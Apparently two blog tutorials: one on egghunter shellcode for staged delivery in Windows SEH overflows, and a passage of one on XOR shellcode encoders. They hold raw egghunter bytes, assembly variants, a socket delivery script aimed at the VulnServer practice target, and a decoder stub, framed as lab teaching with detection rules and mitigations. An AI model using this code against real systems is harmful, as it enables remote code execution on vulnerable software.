Egghunters: Staged Payload Delivery When Buffer Space Is Tight

You’ve overwritten the SEH chain. The POP POP RET gadget drops you into a clean four-byte landing zone, the short jump carries you forward — and you count maybe 60 usable bytes before the buffer turns to garbage. Your stager is 350. That gap, between the space you control and the space your payload needs, is the entire reason egghunters exist.

An egghunter is a tiny piece of shellcode — roughly 32 bytes in its tightest form — whose only job is to walk the process’s virtual address space looking for a marker, then hand execution to whatever sits immediately after that marker. The real payload gets parked somewhere else in memory: a different request field, an HTTP header, the heap. Two stages, loosely coupled. The hunter is small enough to fit in the cramped overflow; the payload can be as large as you like, as long as it’s already resident when the hunter runs.

I’ll walk the mechanism, the two classic Windows implementations, the WoW64 wrinkle on modern Windows, and — because this is a defender’s site first — exactly how the technique lights up your telemetry.

1. Why Egghunters Exist

The technique traces back to Matt Miller (skape) and his survey of “safely searching process virtual address space.” The core insight: you can’t just dereference arbitrary addresses looking for your tag, because most of the address range is unmapped. Touch an unmapped page and you take an access violation, which by default kills the process. So the hunter needs a way to test a page for readability before it reads it.

The layout in memory looks like this:

  small overflow buffer (~32-60B)        elsewhere in the process
  +---------------------------+          +-----------------------------+
  | EGGHUNTER (the "hunter")  | --scan-> | w00tw00t + full shellcode   |
  +---------------------------+          +-----------------------------+
                                  finds the doubled tag, jmp to payload

Two preconditions, both non-negotiable:

At least ~32 reachable bytes to hold the hunter itself.
The full payload must already be in memory when the hunter executes.

That second one bites people. If the payload isn’t resident yet, the hunter scans forever and pegs one CPU core at 100%. The first time I ran a KSTET egghunter I watched the target lock a core and assumed my opcode bytes were wrong. They weren’t — I’d sent the egg-tagged payload after the trigger instead of before, so there was nothing in memory to find. The hunter was working perfectly. It just had nothing to land on.

2. The Page-Walk Problem

x86 virtual memory is paged in 4 KB (0x1000) chunks. A page is either mapped (readable, possibly more) or unmapped (touching it faults). The egghunter exploits this granularity to scan efficiently and safely.

The trick is OR DX, 0x0FFF. That instruction forces the low 12 bits of the iterator register to all-ones, snapping EDX to the last byte of the current page. A following INC EDX rolls it over to the first byte of the next page. So when a page turns out to be invalid, the hunter doesn’t crawl byte-by-byte through 4096 bad addresses; it jumps straight to the next page boundary and probes again. Inside a valid page it advances one byte at a time, comparing the DWORD at each address against the tag, so an egg at any alignment is found.
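The page-snap arithmetic is easy to check outside a debugger. What follows is a minimal Python sketch that models the two instructions on a 32-bit value; the helper name next_page_start is illustrative and not part of any tool.

```python
PAGE_MASK = 0x0FFF        # low 12 bits: byte offset within a 4 KB page
REG_MASK = 0xFFFFFFFF     # EDX is a 32-bit register

def next_page_start(addr: int) -> int:
    """Model `or dx, 0x0fff` followed by `inc edx`."""
    last_byte = addr | PAGE_MASK          # snap to the last byte of the page
    return (last_byte + 1) & REG_MASK     # roll over into the next page

for addr in (0x00401234, 0x00402000, 0xFFFFF123):
    print(f"{addr:#010x} -> {next_page_start(addr):#010x}")
```

The last sample address shows the wrap-around: past the top page the pointer returns to zero, which is why a hunter with nothing to find keeps cycling through the address space.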

The brief table of moving parts:

Component	Detail
Memory iterator register	`EDX` holds the current scan address
Page-boundary jump	`OR DX, 0x0FFF` → end of page; `INC EDX` → start of next page
Validity probe	A syscall (or an SEH frame) tests whether the page is readable
Egg comparison	`SCASD` compares `EAX` to `[EDI]` and auto-increments `EDI`
Transfer to payload	`JMP EDI` once both halves of the egg match

[Figure: flowchart of the egghunter page-walk loop: snapping EDX to page boundaries with OR DX, 0x0FFF, probing validity via INT 0x2E, skipping on access violation, scanning with SCASD, and jumping to the payload on egg match.] The egghunter skips entire 4 KB pages on access violations rather than crawling byte-by-byte, keeping scan time tractable across the full virtual address space.

3. Anatomy of the Syscall Egghunter

The canonical 32-byte hunter uses the kernel as a page-validity oracle. It invokes NtAccessCheckAndAuditAlarm via the legacy INT 0x2E syscall gate and inspects the return: STATUS_ACCESS_VIOLATION (0xC0000005) means the page is bad, so skip it.

; --- 32-byte syscall egghunter (skape), egg = "w00t" ---
loop_inc_page:
    or   dx, 0x0fff        ; EDX -> last byte of current 4KB page
loop_inc_one:
    inc  edx               ; advance one byte (rolls into next page)
loop_check:
    push edx               ; save scan pointer (clobbered by syscall)
    push 0x2               ; NtAccessCheckAndAuditAlarm syscall # (x86, XP-7)
    pop  eax               ;   -> EAX = 0x2   *** verify per OS, see j00ru ***
    int  0x2e              ; legacy syscall gate
    cmp  al, 0x05          ; low byte of STATUS_ACCESS_VIOLATION (0xC0000005)?
    pop  edx               ; restore scan pointer
    je   loop_inc_page     ; bad page -> skip to next page boundary
is_egg:
    mov  eax, 0x74303077   ; "w00t"
    mov  edi, edx          ; EDI = current address
    scasd                  ; compare [EDI] to EAX, EDI += 4
    jnz  loop_inc_one      ; first half mismatch -> keep scanning
    scasd                  ; compare the *second* half of the egg
    jnz  loop_inc_one
matched:
    jmp  edi               ; EDI now points just past the doubled tag

Two SCASD instructions back to back are doing something specific: the tag is the 4-byte value repeated twice (eight bytes total). Requiring both halves to match makes a false positive vanishingly unlikely, and because SCASD auto-advances EDI, after the second success EDI already points at the byte after the egg — exactly where the payload begins. Skape’s IsBadReadPtr-based variant runs 37 bytes; an NtDisplayString variant is also 32 bytes and works identically — only the syscall number differs.
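The double comparison can be modelled over an ordinary byte string. This is a hedged sketch of the matching logic only (no page probing, no real memory access); the hunt function and the sample buffer are made up for illustration.

```python
TAG = b"w00t"

# The MOV EAX immediate is the tag read as a little-endian DWORD.
assert int.from_bytes(TAG, "little") == 0x74303077

def hunt(memory: bytes, tag: bytes = TAG):
    """Return the offset just past the first doubled tag, or None."""
    n = len(tag)
    for edx in range(len(memory) - 2 * n + 1):   # inc edx: one byte at a time
        edi = edx
        if memory[edi:edi + n] != tag:           # first scasd
            continue
        edi += n
        if memory[edi:edi + n] != tag:           # second scasd
            continue
        return edi + n                           # where jmp edi would land
    return None

# A lone tag at offset 2 is skipped; the doubled tag at offset 10 matches.
memory = b"\x90\x90" + TAG + b"junk" + TAG + TAG + b"PAYLOAD"
entry = hunt(memory)
print(entry, memory[entry:])
```

The single copy of the tag is rejected by the second comparison, which is the same reason the hunter does not match the tag embedded in its own MOV EAX instruction.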

Identifier	Value / Note
Syscall	`NtAccessCheckAndAuditAlarm`
Syscall number (x86 XP–7)	`0x02`
Invocation	`INT 0x2E`
Access-violation status	`0xC0000005` → `CMP AL, 0x05`
Invalid-page action	`JE loop_inc_page`
Size	~32 bytes

Syscall numbers are OS-version specific. 0x02 is stable on 32-bit XP/Vista/7; Windows 10 moved the table and changed the argument layout. Always confirm against Mateusz “j00ru” Jurczyk’s tables for your exact target build: j00ru.vexillium.org/syscalls/nt/32/ for native x86 targets, and j00ru.vexillium.org/syscalls/nt/64/ for the 64-bit numbers a WoW64 hunter needs (section 6).

4. The SEH-Based Variant

Rather than ask the kernel whether a page is valid, this approach installs a temporary Structured Exception Handler, reads memory blindly, and lets faults route into the handler — which simply advances the pointer and resumes. It runs around 60 bytes, but it carries no hardcoded syscall number, so it survives OS version drift better than the syscall hunter.

; --- SEH-based egghunter (illustrative, ~60 bytes) ---
; Register a handler so a read fault resumes scanning instead of crashing.
    push handler            ; EXCEPTION_REGISTRATION_RECORD.Handler
    push dword [fs:0]        ; .Next = current head of the SEH chain
    mov  [fs:0], esp         ; install our frame as the new chain head

    xor  edx, edx            ; scan pointer
scan_loop:
    inc  edx
    mov  edi, edx
    mov  eax, 0x74303077     ; "w00t"
    scasd                    ; read [EDI]; faults route into 'handler'
    jnz  scan_loop
    scasd                    ; confirm second half of the egg
    jnz  scan_loop
    pop  dword [fs:0]        ; restore previous SEH frame
    add  esp, 4
    jmp  edi                 ; transfer to payload
handler:                     ; entered on STATUS_ACCESS_VIOLATION
    ; bump saved EDX in the CONTEXT past the bad page,
    ; return ExceptionContinueExecution, resume scan_loop
    ret

Feature	Syscall variant	SEH variant
Size	~32 bytes	~60 bytes
Validity check	`INT 0x2E` → `NtAccessCheckAndAuditAlarm`	Custom `FS:[0]` handler
OS portability	Fragile (syscall # changes)	More portable
Detection surface	`INT 0x2E` is glaring	Quieter, but installs an SEH frame

That detection-surface row matters from both chairs. The SEH hunter gets recommended as the “portable” choice, and it is — but the syscall hunter’s INT 0x2E is so unused by legitimate user-mode code that flagging it is nearly a free win for the blue team.

[Figure: hierarchy diagram comparing the two classic egghunter variants: the 32-byte syscall hunter using INT 0x2E with OS-specific syscall numbers versus the 60-byte SEH hunter using a custom FS:[0] fault handler with better portability.] The syscall hunter wins on size but loses on portability; the SEH hunter avoids hardcoded syscall numbers at the cost of roughly double the byte footprint and its own SEH-frame detection surface.

5. Egg Tags and Bad Characters

The tag is a 4-byte value written twice. Common choices: w00tw00t (0x74303077), T00WT00W, b33fb33f, c0d3c0d3, ERCDERCD. Two independent constraints govern selection.

First, every byte of the hunter and the tag must avoid the vulnerable function’s bad characters — \x00, \x0A, \x0D are the usual suspects for string-based bugs, but the set is target-specific. Profile it before you commit to a tag.

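Second, and easy to forget: the doubled 8-byte egg must be unique in process memory. A lone 4-byte copy of the tag is harmless, because the second SCASD rejects it; that is the whole reason the tag is doubled, since the hunter’s own MOV EAX immediate already contains one copy. A second copy of the full doubled egg is the real hazard: if one sits at a lower address than your intact payload (a stale or truncated copy, or one elsewhere in your own crafted buffer), the hunter reaches it first and executes whatever follows. Scan your buffer before sending:

def egg_is_unique(buffer: bytes, tag: bytes) -> bool:
    egg   = tag * 2                        # the hunter only matches the doubled tag
    first = buffer.find(egg)
    if first == -1:
        print(f"[!] doubled egg {egg!r} not found in buffer")
        return False
    second = buffer.find(egg, first + 1)   # any further copy, overlaps included
    if second != -1:
        print(f"[!] doubled egg {egg!r} appears at offsets {first} and {second}")
        return False
    return True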

The bad-character hunt itself is methodology, not a payload: send a known byte sequence, then diff the receiving buffer in the debugger against what you sent.

# Bad-character probe — compare against the in-memory dump in x64dbg/Immunity
allchars = bytes(range(1, 256))           # skip \x00 explicitly, test the rest
probe = b"A" * 66 + b"B" * 4 + allchars
# Any byte that is mangled, truncated, or terminates the string is "bad".

6. WoW64 and Windows 10

Run a 32-bit egghunter on 64-bit Windows 10 and the old PoCs frequently misfire — the syscall table and ABI underneath WoW64 aren’t what the XP-era hunter expects. The working approach (Corelan published a tested version) uses Heaven’s Gate: transitioning a WoW64 thread from 32-bit to 64-bit mode to issue the real syscall.

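The CS segment selector reveals the mode: 0x23 for 32-bit code, 0x33 for 64-bit. The hunter checks it, then makes an indirect call through the pointer stored at FS:[0xC0] (the TEB’s WOW32Reserved field). That pointer leads to the WoW64 transition stub, which performs the far jump to selector 0x33 and issues the 64-bit syscall.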

; --- WoW64 / Heaven's Gate egghunter (conceptual fragment) ---
    mov  ebx, cs            ; read code-segment selector
    cmp  bl, 0x23           ; 0x23 = 32-bit (WoW64) execution?
    ; ... stage 64-bit syscall args ...
    mov  bl, 0xc0
    call dword [fs:ebx]     ; indirect call via the pointer at FS:[0xC0] -> WoW64 gate (far jmp to 0x33)
    cmp  al, 0x05           ; STATUS_ACCESS_VIOLATION low byte
    je   loop_inc_page

The Exploit-DB WoW64 sample (45293) pushes 0x29 as the NtAccessCheckAndAuditAlarm number on a particular Windows 10 x64 build. Don’t copy that number blindly — verify it against j00ru’s table for your build, because it’s exactly the field that breaks between releases.

7. Wiring It Into an SEH Overflow

A typical delivery rides a standard SEH overwrite: nSEH gets a short jump forward, SEH gets a POP/POP/RET gadget that returns into nSEH, the short jump skips over the SEH record, and the hunter runs from there.

[ PADDING ][ nSEH: \xEB\x06\x90\x90 ][ SEH: pop/pop/ret addr ][ egghunter ]
   ... and the egg-tagged full payload lives in a SEPARATE field/request ...

#!/usr/bin/env python3
# LAB ONLY — staged egghunter delivery skeleton (offsets/gadget are placeholders)
import socket
RHOST, RPORT = "192.168.56.20", 9999

egghunter = (                       # 32-byte syscall hunter, tag "w00t"
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
nseh = b"\xeb\x06\x90\x90"           # jmp +6 over the SEH record
seh  = b"\x42\x42\x42\x42"           # PLACEHOLDER pop/pop/ret (find per target)
egg  = b"w00tw00t"                   # tag, doubled
payload = egg + b"\x90" * 16 + b"\xcc"   # \xcc = test int3; swap for calc.exe popup in lab

trigger  = b"A" * 66 + nseh + seh + egghunter
trigger += b"C" * (1000 - len(trigger))

with socket.create_connection((RHOST, RPORT)) as s:
    s.recv(1024)
    s.send(b"KSTET " + payload + b"\r\n")   # 1) stage the egg-tagged payload first
    s.send(b"KSTET " + trigger + b"\r\n")   # 2) THEN trigger overflow + run hunter

[Figure: flow diagram of a staged SEH overflow layout: padding leading to the nSEH short jump, the SEH POP-POP-RET gadget, the egghunter in the constrained overflow buffer, and the egg-tagged full payload delivered separately in another request field.] The egg-tagged payload must arrive in a separate request before the overflow trigger is sent; reversing the order leaves the hunter scanning endlessly with nothing to find.

Order matters — payload first, trigger second. Reverse it and you get the 100% CPU loop from section 1.

8. Lab: VulnServer KSTET

VulnServer’s KSTET command is the standard teaching target: its overflow leaves a constrained buffer that naturally forces a staged approach. The workflow:

Attach VulnServer in Immunity Debugger or x64dbg.
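Fuzz KSTET and find the offset to control with a cyclic pattern. On stock VulnServer builds KSTET gives a direct EIP overwrite rather than an SEH overwrite; GMON is the SEH-based command if you want to practice the section 7 layout.
Locate a clean gadget in a non-/SAFESEH, non-ASLR module: JMP ESP for the EIP overwrite, POP/POP/RET for an SEH overwrite.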
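Generate the hunter with mona: !mona egg -t w00t. To keep bad characters out of the output, pass mona’s -cpb option with the byte list (for example -cpb '\x00\x0a\x0d'); the -c flag enables a checksum routine rather than bad-char encoding. Mona can emit both SEH-based and NtAccessCheckAndAuditAlarm-based hunters.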
Set a breakpoint on the SCASD (\xAF) opcode and single-step to watch EDI march toward the egg — this is the moment that makes the mechanism click.

Read the manual assembly alongside mona’s output. Treat mona as a generator, not a black box. Use a calc.exe/cmd.exe popup as the test payload — never real C2.

9. Detecting Egghunter Behavior

The hunter is loud if you’re listening. Two behavioral tells lead:

A single thread pegged at 100%, particularly right after a crash-and-recover on a network service — the symptom of a hunter scanning with no resident payload.
NtAccessCheckAndAuditAlarm fired thousands of times in rapid succession, which no legitimate user-mode workload does. It surfaces in ETW syscall traces.
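The second tell reduces to a sliding-window count. The sketch below assumes you already have a per-thread stream of (timestamp in seconds, syscall name) pairs exported from an ETW trace; that event shape, the function name find_syscall_burst, and the 1000-calls-per-second threshold are all assumptions for illustration, not values from any product.

```python
from collections import deque

def find_syscall_burst(events, name="NtAccessCheckAndAuditAlarm",
                       window_s=1.0, threshold=1000):
    """Return the timestamp at which `name` first reaches `threshold`
    calls within `window_s` seconds, or None. `events` must be time-sorted."""
    recent = deque()
    for ts, syscall in events:
        if syscall != name:
            continue
        recent.append(ts)
        while ts - recent[0] > window_s:      # drop calls older than the window
            recent.popleft()
        if len(recent) >= threshold:
            return ts
    return None

# Synthetic traces: a tight probing loop versus one call per second.
hunter_like = [(i * 0.0001, "NtAccessCheckAndAuditAlarm") for i in range(2000)]
background = [(float(i), "NtAccessCheckAndAuditAlarm") for i in range(50)]
print(find_syscall_burst(hunter_like) is not None, find_syscall_burst(background))
```

Tune the window and threshold against your own baseline; the point is only that the hunter's call rate sits orders of magnitude above anything a normal workload produces.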

Event ID	Name	Relevance
`1`	Process Creation	Baseline parent-child chain for the vulnerable service
`8`	CreateRemoteThread	Egg payload injecting; `StartModule`/`StartFunction` empty when the start address is outside loaded modules — a shellcode tell
`10`	ProcessAccess	Cross-process handles requesting `PROCESS_VM_WRITE` (`0x0020`), `PROCESS_VM_OPERATION` (`0x0008`), `PROCESS_CREATE_THREAD` (`0x0002`)
`25`	ProcessTampering	Sysmon 13+; in-memory image diverging from disk — hallmark of in-memory execution

Default SwiftOnSecurity Sysmon config won’t catch CreateRemoteThread injection out of the box because of kernel32.dll exclusions — tune it before you rely on Event ID 8.

title: Remote Thread Start Address Outside Loaded Modules
id: 5a9d3e21-egg0-4c11-9f0a-shellcodeloader   # placeholder, not a valid UUID: generate a real UUIDv4 before deploying
status: experimental
logsource:
  product: windows
  category: create_remote_thread     # Sysmon Event ID 8
detection:
  selection:
    StartModule: ''
    StartFunction: ''
  condition: selection
level: high

Pair that with Microsoft-Windows-Threat-Intelligence ETW (fires on WriteProcessMemory/CreateRemoteThread, needs PPL to consume) and audit policy: auditpol /set /subcategory:"Process Creation" /success:enable yields Security Event 4688 with command lines. And flag INT 0x2E in user mode wherever EDR or ETW lets you — it’s about as high-fidelity as indicators get.

YARA pins the syscall hunter’s opcode signature for memory forensics:

rule Egghunter_Syscall_x86 {
    meta:
        description = "skape NtAccessCheckAndAuditAlarm egghunter (~32 bytes)"
        author = "GenXCyber"
    strings:
        $page_walk = { 66 81 CA FF 0F }   // or dx, 0x0fff
        $syscall   = { CD 2E }            // int 0x2e
        $av_check  = { 3C 05 }            // cmp al, 0x05
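        $scan      = { AF 75 ?? AF 75 ?? FF E7 }   // scasd; jnz; scasd; jnz; jmp edi
    condition:
        // Anchor on each page-walk hit and require the rest inside the 32-byte window.
        // A bare { AF } string matches almost everywhere, and @a - @b can go negative.
        for any i in (1..#page_walk) : (
            $syscall  in (@page_walk[i]..@page_walk[i] + 32) and
            $av_check in (@page_walk[i]..@page_walk[i] + 32) and
            $scan     in (@page_walk[i]..@page_walk[i] + 32)
        )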
}
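Before trusting any opcode signature, it helps to confirm that it fires on the known sample and stays quiet on filler. The following is a small self-check in plain Python using the 32 hunter bytes from section 7; the regular expression is a simplified stand-in for the rule's core sequence (page walk, then INT 0x2E, then the AL check), and the gap limits are assumptions rather than part of the YARA rule.

```python
import re

# Canonical 32-byte hunter from section 7 (tag "w00t").
HUNTER = bytes.fromhex(
    "6681caff0f42526a0258cd2e3c055a74"
    "efb8773030748bfaaf75eaaf75e7ffe7"
)

SIGNATURE = re.compile(
    re.escape(bytes.fromhex("6681caff0f"))   # or dx, 0x0fff
    + rb".{0,16}?"                           # short gap (assumed limit)
    + re.escape(bytes.fromhex("cd2e"))       # int 0x2e
    + rb".{0,8}?"                            # short gap (assumed limit)
    + re.escape(bytes.fromhex("3c05")),      # cmp al, 0x05
    re.DOTALL,
)

def find_hunters(blob: bytes) -> list:
    """Return offsets where the page-walk / syscall / AV-check sequence starts."""
    return [m.start() for m in SIGNATURE.finditer(blob)]

dump = b"\x90" * 16 + HUNTER + b"\x00" * 16   # synthetic "memory dump"
print(find_hunters(dump), find_hunters(b"\x90" * 64))
```

The same two-sided check (one known-positive, one known-negative buffer) is worth running against the YARA rule itself before it goes into a memory-forensics pipeline.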

10. Tools for Egghunter Analysis

Tool	Description	Link
mona.py	Generates/verifies egghunters (`!mona egg`) in Immunity	`corelan.be`
Immunity Debugger	Classic exploit-dev debugger, mona host	`immunityinc.com`
x64dbg	Free user-mode debugger for stepping the scan	`x64dbg.com`
VulnServer	Safe, intentionally vulnerable practice target	`github.com`
Process Hacker	Spot the 100% CPU thread and handle access	`processhacker.sourceforge.io`
Sysmon	EID 8/10/25 telemetry for shellcode behavior	`microsoft.com`
j00ru syscall table	Authoritative per-OS syscall numbers	`j00ru.vexillium.org`
osed-scripts (epi052)	Egghunter generator and OSED helpers	`github.com`

11. Mitigations and Modern Reality

Egghunters were a 32-bit-era staple, and modern defenses have narrowed their utility considerably.

Mitigation	Effect on the technique
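DEP / NX	Neither the hunter nor the payload executes from a non-executable stack or heap without a ROP stage first; primary kill switch for legacy targets
ASLR	Hardcoded `POP/POP/RET` addresses break unless the gadget comes from a non-ASLR module; forces wider scans → more CPU and ETW noise
Control Flow Guard	Validates compiler-instrumented indirect calls, so it can block the initial function-pointer hijack; it does not check the hunter’s own `JMP EDI` once shellcode is running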
GS / stack canaries	Don’t stop the hunter, but can stop the overflow that delivers it
App sandboxing	Limits post-execution blast radius

The technique still earns its place in OSED-style coursework and against unhardened legacy 32-bit software — which is exactly where you find it in real engagements.

12. MITRE ATT&CK Mapping

Egghunters are delivery scaffolding, not a post-exploitation tactic. There’s no ATT&CK sub-technique for “egghunter,” and you shouldn’t invent one. It sits upstream of the payload, in the exploitation-and-loading layer. Map the surrounding behavior:

Technique	MITRE ID	Detection
Exploitation for Client Execution	`T1203`	Service crash/recover, EID 1 anomalies
Process Injection	`T1055`	Sysmon EID 8/10, TI ETW
Process Injection: DLL Injection	`T1055.001`	EID 8 with empty `StartModule`
Reflective Code Loading	`T1620`	In-memory PE, EID 25 ProcessTampering
Obfuscated Files or Information	`T1027`	Encoded egg payload, YARA on decoder stubs
Virtualization/Sandbox Evasion: Time Based Evasion	`T1497.003`	CPU-spike artifact in sandboxes

Summary

An egghunter is a ~32-byte stage-1 stub that scans process memory for a doubled tag and jumps to the stage-2 payload — the answer to “my buffer is too small for real shellcode.”
The hunter walks memory page-by-page (OR DX, 0x0FFF), validates each page via NtAccessCheckAndAuditAlarm/INT 0x2E (or an SEH frame), and confirms the egg with two consecutive SCASD instructions before JMP EDI.
The payload must already be resident when the hunter runs; otherwise it loops and pegs a CPU core — a behavioral indicator in its own right.
Syscall numbers are OS-version specific (verify against j00ru) and WoW64 needs Heaven’s Gate, so portability is the real-world friction.
Detect it via the INT 0x2E anomaly, rapid NtAccessCheckAndAuditAlarm bursts, Sysmon EID 8 threads with empty StartModule, EID 25 tampering, and a YARA signature on the canonical opcode window — and mitigate upstream with DEP, ASLR, and CFG.

Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars

You found the overflow. You control EIP. Your execve("/bin/sh") payload runs perfectly in the debugger — and then dies the moment it crosses the wire. Nine times out of ten the culprit is a single byte the transport or a string routine refused to carry intact. A \x00 that strcpy treated as end-of-string. A \x0a the protocol parser read as newline. The fix isn’t a better payload; it’s an encoder that launders the offending bytes out, plus a tiny decoder that rebuilds the original at runtime.

This walks through XOR encoding end to end — the byte math, a Python encoder, a position-independent decoder stub in x86 NASM, a per-chunk keyed variant, stack-based decoding, and what shikata_ga_nai adds on top. Every stub here decodes a benign exit(0) payload. The point is to understand the mechanism well enough to detect and defend against it, so the final third is all blue team.

1. Why Shellcode Breaks: Bad Characters

A bad character is any byte value the delivery path mangles, truncates, or drops before your shellcode lands in executable memory intact. The constraint comes from the vulnerability, not from the payload.

Byte	Name	Why it breaks things
`\x00`	NULL	Terminates C strings; `strcpy`/`sprintf` stop copying here
`\x0a`	Line Feed	Read as end-of-input by line-oriented protocols and `gets`
`\x0d`	Carriage Return	Paired with `\x0a` in HTTP/SMTP headers; often stripped
`\x20`	Space	Token delimiter in many parsers
`\xff`	0xFF	Sentinel / length markers in some binary protocols

The list is per target. A web exploit might tolerate \x00 (the buffer isn’t a C string) but choke on \x26 (&) because of URL parsing. You don’t guess — you measure (Section 3).

2. The XOR Contract

XOR is the canonical encoding operation for one reason: it’s its own inverse. XOR a byte with a key, XOR the result with the same key, and you’re back where you started.

A ⊕ K ⊕ K = A

A	K	A ⊕ K
0	0	0
0	1	1
1	0	1
1	1	0

There’s no key schedule, no S-box, no state to carry — which matters because every byte of decoder stub is a byte that isn’t shellcode. A single-byte XOR decoder fits in well under 20 bytes. That economy is exactly why it shows up in real tooling and why analysts learn to recognize its shape on sight.

The encoder’s job is to pick a key K such that original_byte ⊕ K is never a bad character, for every byte in the payload. If a candidate key produces even one collision, throw it away and try the next. One collision is easy to overlook: any key equal to a byte already in the payload encodes that byte to \x00, so when \x00 is bad, every byte value present in the payload is disqualified as a key.
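Both properties, the round trip and the zero collision, can be checked in a few lines. This is a minimal sketch using the benign exit(0) bytes that Section 4 encodes; the helper names xor_bytes and zero_offsets are illustrative.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)

# Benign exit(0) stub, the same bytes Section 4 encodes.
payload = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])

# Involution: applying the same key twice restores the input, for every key.
assert all(xor_bytes(xor_bytes(payload, k), k) == payload for k in range(256))

def zero_offsets(data: bytes, key: int) -> list:
    """Offsets whose encoded value is 0x00, i.e. where data[i] == key."""
    return [i for i, b in enumerate(xor_bytes(data, key)) if b == 0]

print(zero_offsets(payload, 0x31))   # key equals a payload byte
print(zero_offsets(payload, 0xAA))   # key absent from the payload
```

With key 0x31 the two xor opcodes at offsets 0 and 4 encode to \x00; with 0xAA nothing does, which is why a key search rejects any key that already occurs in the payload whenever \x00 is in the bad set.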

[Figure: flow diagram of shellcode going through key search and XOR encoding, crossing a hostile transport layer, then being decoded by the stub and executed on the target.] XOR encoding and decoding are symmetric operations: the same key byte transforms the payload in both directions, so only a tiny stub is needed at runtime.

3. Finding the Bad Chars

Before you encode anything, you enumerate what to avoid. The workflow is mechanical:

Build a test pattern of all 256 byte values, \x00 through \xff, minus any you already know are bad.
Drop it into the vulnerable buffer and dump the buffer from memory.
Diff the dump against what you sent. The first byte that’s wrong (mangled, missing, or where the copy stopped) is a bad char.
Add it to the list, regenerate the pattern without it, repeat until the whole pattern survives byte-for-byte.

A small diff helper makes step 3 fast:

#!/usr/bin/env python3
# Bad-char scanner: compare what you sent vs. what landed in memory.
def first_bad(expected: bytes, received: bytes):
    for i, (e, r) in enumerate(zip(expected, received)):
        if e != r:
            return i, hex(e), hex(r)          # index, sent, received
    if len(received) < len(expected):         # copy stopped early
        i = len(received)
        return i, hex(expected[i]), "(truncated)"   # first byte that never arrived
    return None

# expected = bytes(range(0x01, 0x100))        # full pattern minus \x00
# received = open("dump.bin","rb").read()
# print(first_bad(expected, received))

Truncation tells you something extra: the first byte that failed to arrive, expected[len(received)], is usually the terminator. Note it, exclude it, run again.
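The repeat-until-clean loop can be rehearsed offline before touching a debugger. In the sketch below, simulated_copy is a hypothetical stand-in for the vulnerable copy routine (it simply stops at the first terminator byte), and enumerate_bad_chars is an illustrative name; on a real target the "received" bytes come from the memory dump instead.

```python
def simulated_copy(data: bytes, terminators=frozenset({0x00, 0x0a, 0x0d})) -> bytes:
    """Hypothetical vulnerable copy: stops at the first terminator byte."""
    for i, b in enumerate(data):
        if b in terminators:
            return data[:i]
    return data

def enumerate_bad_chars(copy_fn) -> set:
    """Resend a shrinking pattern until it survives byte-for-byte."""
    bad = set()
    while True:
        pattern = bytes(b for b in range(256) if b not in bad)
        received = copy_fn(pattern)
        if received == pattern:
            return bad
        # First divergence, or the cut-off point when the copy was truncated.
        i = next((n for n, (e, r) in enumerate(zip(pattern, received)) if e != r),
                 len(received))
        bad.add(pattern[i])

found = enumerate_bad_chars(simulated_copy)
print(sorted(hex(b) for b in found))
```

Each pass identifies exactly one offender, so the loop runs once per bad character plus a final clean pass.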

4. Building an XOR Encoder in Python

The encoder ingests raw shellcode and the confirmed bad-char set, searches for a clean single-byte key, and emits the encoded blob.

#!/usr/bin/env python3
# XOR shellcode encoder — teaching / authorized-lab use only.

# Benign x86 stub: exit(0)  (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80)
shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
bad_chars = {0x00, 0x0a, 0x0d}

def find_key(sc, bad):
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in sc):   # no encoded byte is bad
            return key
    return None

key = find_key(shellcode, bad_chars)
if key is None:
    raise SystemExit("[-] No single-byte key is clean. Use per-chunk keying.")

encoded = bytes(b ^ key for b in shellcode)
print(f"[+] key   = {hex(key)}")
print(f"[+] length = {len(encoded)}")
print("[+] blob  = " + "".join(f"\\x{b:02x}" for b in encoded))

If find_key returns None, no single byte can XOR the whole payload clean — you’ve over-constrained the key space. That’s the cue to move to a per-chunk scheme (Section 7), where each chunk gets its own key.

5. The Decoder Stub in x86 (NASM)

The stub runs first on the target, decodes the bytes that follow it, and jumps into them. The hard part is position independence: the stub doesn’t know its own load address, so it can’t hardcode a pointer to the encoded blob. The classic answer is JMP-CALL-POP — a forward jmp short to a call that points backward, so the call pushes the address of the bytes immediately after it. pop that return address and you’ve located your payload at runtime.

section .text
global _start

_start:
    jmp short get_payload      ; (1) hop over the decoder to the CALL

decoder:
    pop  esi                   ; (3) ESI -> first encoded byte
    xor  ecx, ecx
    mov  cl, payload_len       ; loop counter = payload length
decode_loop:
    xor  byte [esi], 0xAA      ; (4) decode one byte, key = 0xAA
    inc  esi                   ; advance
    loop decode_loop           ; ECX--, repeat while non-zero
    jmp  payload               ; (5) run the now-decoded shellcode

get_payload:
    call decoder               ; (2) pushes addr of `payload`, jumps back

payload:
    db   0xcc, 0xcc, 0xcc      ; <-- splice encoder output here
payload_len equ $ - payload

jmp payload assembles to a relative offset, so it stays position-independent without touching ESI. The loop instruction (0xE2) decrements ECX and branches while non-zero.

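Here’s the gotcha that cost me an afternoon once: CL is eight bits. mov cl, payload_len truncates anything over 255 bytes, with at most an assembler warning, so a 300-byte payload decodes only its first 44 bytes (300 mod 256) and then jumps into still-encoded garbage. The crash makes no sense until you check ECX. For longer payloads, keep the xor ecx, ecx and load the 16-bit counter with mov cx, payload_len. The full mov ecx, payload_len also works logically, but its 32-bit immediate carries \x00 bytes for any realistic length, which reintroduces the most common bad character into the stub.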
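Whichever wider form you choose, it is worth checking the immediate's own bytes against your bad-char set, since widening the counter can introduce \x00. A short sketch of that arithmetic follows; counter_forms is an illustrative helper, and it models only the immediate operand, not the opcode bytes in front of it.

```python
import struct

def counter_forms(length: int) -> dict:
    """Immediate bytes for each way of loading the loop counter."""
    forms = {"mov cl, imm8": bytes([length & 0xFF])}       # wraps past 255
    if length <= 0xFFFF:
        forms["mov cx, imm16"] = struct.pack("<H", length)
    forms["mov ecx, imm32"] = struct.pack("<I", length)
    return forms

for n in (8, 300):
    print(f"payload_len = {n}: CL would hold {n & 0xFF}")
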